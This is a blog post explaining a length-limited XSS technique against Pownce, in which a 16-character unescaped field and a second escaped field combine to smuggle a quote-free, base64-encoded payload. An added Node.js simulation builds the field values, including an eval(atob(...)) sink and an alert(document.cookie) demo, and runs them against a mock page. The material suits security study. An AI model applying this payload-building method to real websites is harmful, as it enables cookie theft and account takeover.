
XSS When Payload is Limited

February 13, 2008

Another interesting post by pdp of GnuCitizen: he found an XSS and an XSRF flaw in Pownce, but that is not the interesting part of the article.

What makes it worth reading is pdp's technique for injecting the JavaScript. Only one field is vulnerable (it does not escape user input), and it is limited to 16 characters. Any useful attack needs far more than 16 characters.

What makes the technique work is that below the vulnerable field there is a second field that also takes user input but does escape it correctly, so angle brackets and quotes come out as HTML entities. Between the two fields sits some HTML junk. All the first field has to hold is an opening script tag followed by the start of a multi-line JavaScript comment; the junk up to the second field is then swallowed by that comment. In the second field, all that is left to do is close the comment and write JavaScript that works without angle brackets or quotes, since those would be turned into entities. The string for the real payload comes from a regular-expression literal: /.../.toString() gives the literal back as a string including its slashes, substr() cuts them off, and atob() decodes the base64 in between.

As I’m writing this I realize that I’m probably not very good at explaining, so just have a look at the code and you’ll see what I mean:

[html junk]

*/<script>/*

[html junk]

*/document.write(atob(/PHN[...]EtLQ==/.toString().substr(1,56)));/*

[html junk]

The sample uses document.write(), but put eval() in its place and you can execute arbitrarily long base64-encoded JavaScript this way, as long as the second field accepts it. One thing to watch: the base64 sits inside a regular-expression literal, so it must still parse as one (a slash in it would end the literal early).
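The whole thing can be tried offline. What follows is an added example written for this post, not pdp's code and not anything from Pownce: a small Node.js simulation of a page with one unescaped 16-character field and one correctly escaped field, with constructed HTML junk between them and a constructed footer script after them. It builds the two field values, renders the page, extracts what a browser would treat as the script element's content, and runs it against stubbed document and alert objects. The sink is eval(atob(...)), the variant mentioned just above, instead of the document.write() in the original payload; the quote-free string trick is the same. It also carries two checks worth making on a real target: the base64 inside the regular-expression literal has to parse as a regular expression (a slash ends the literal, a leading plus or a doubled plus is a syntax error, and the example realigns the base64 by prepending whitespace when that happens), and the trailing open comment must be closed by something later on the page before the script element ends, otherwise the browser rejects the whole script as a syntax error and nothing runs. All names, the template and the stubbed values are assumptions made for the demonstration.

```javascript
// Added example for this post (not pdp's code, not Pownce's): a Node.js simulation of
// the two-field page. Template, junk and names are constructed for the demonstration.

const FIELD1_MAX = 16;   // limit of the unescaped field, as stated in the post

// HTML entity escaping of the kind the second, "correctly escaped" field gets.
function htmlEscape(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;').replace(/>/g, '&gt;')
          .replace(/"/g, '&quot;').replace(/'/g, '&#39;');
}

// Constructed profile page: field1 is echoed raw (the bug), field2 is escaped, and
// some markup sits between them. The page's own footer script is what closes the
// injected <script> element (the first </script> wins), and its "*/" is what closes
// the trailing open comment. On a real target both need checking: an unclosed /*
// is a SyntaxError, and then none of the script runs.
function renderProfile(field1, field2) {
  if (field1.length > FIELD1_MAX) throw new Error('field1 exceeds ' + FIELD1_MAX + ' chars');
  return '<h1>' + field1 + '</h1>\n' +
    '<p class="bio">' + htmlEscape(field2) + '</p>\n' +
    '<script type="text/javascript">\n/* tracker */\nvar pageId = 42;\n</script>\n' +
    '</body></html>';
}

// The base64 alphabet has no quotes or angle brackets, but the literal must still
// parse as a regex: "/" would end it early, and "+" is only valid as a quantifier,
// so a leading "+" or a "++" is a SyntaxError ("nothing to repeat").
function isRegexSafeBase64(b64) {
  return !b64.includes('/') && !b64.startsWith('+') && !b64.includes('++');
}

// Prepending a byte shifts every later base64 group, and leading whitespace is
// harmless JavaScript, so three alignments can be tried before the payload itself
// has to be reworded.
function encodePayload(jsSource) {
  for (let pad = 0; pad < 3; pad++) {
    const b64 = Buffer.from(' '.repeat(pad) + jsSource, 'latin1').toString('base64');
    if (isRegexSafeBase64(b64)) return b64;
  }
  throw new Error('reword the payload: no alignment gives regex-safe base64');
}

// The two field values. /abc/.toString() is "/abc/" and substr(1, 3) strips both
// slashes, so the string reaches atob() without a single quote being typed.
function buildFields(jsSource) {
  const b64 = encodePayload(jsSource);
  return {
    // 12 characters, within the 16 allowed; the leading */ is inert text here
    // because it sits outside any script element (kept to match the post's payload).
    field1: '*/<script>/*',
    field2: '*/eval(atob(/' + b64 + '/.toString().substr(1,' + b64.length + ')));/*',
  };
}

// What a browser would do: take everything after the first <script> up to the
// first </script> as script data, then run it. document and alert are stubs so the
// effect can be observed; eval() inside the body is a direct eval and sees them.
function runInFakeBrowser(html) {
  const m = html.match(/<script>([\s\S]*?)<\/script>/);
  if (!m) throw new Error('no script element found');
  const alerts = [];
  const fakeDocument = { cookie: 'sid=constructed-value' };   // constructed stub
  const fakeAlert = (msg) => alerts.push(String(msg));
  const atobImpl = (b) => Buffer.from(b, 'base64').toString('latin1');
  new Function('document', 'alert', 'atob', m[1])(fakeDocument, fakeAlert, atobImpl);
  return { scriptBody: m[1], alerts };
}

// End-to-end run; returns the fields, whether escaping left field2 untouched, the
// script as the browser sees it, and what the payload managed to do.
function demo(jsSource) {
  const { field1, field2 } = buildFields(jsSource);
  const html = renderProfile(field1, field2);
  return { field1, field2, escapedUnchanged: htmlEscape(field2) === field2, ...runInFakeBrowser(html) };
}

const result = demo('alert(document.cookie)');
console.log('field1:', result.field1);
console.log('field2:', result.field2);
console.log('script as the browser sees it:\n' + result.scriptBody);
console.log('alerts:', result.alerts);
```

The printed script body shows the junk between the fields sitting inside the first comment and the junk after the second field, up to the footer script's own "*/", inside the second one; only the eval() call and the footer's harmless variable assignment are left to execute. Running demo('1 ?2:3') instead shows the realignment: that source encodes to base64 containing a slash, so one space is prepended before the regex-safe encoding is used.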

Picture of small house by Dom Dada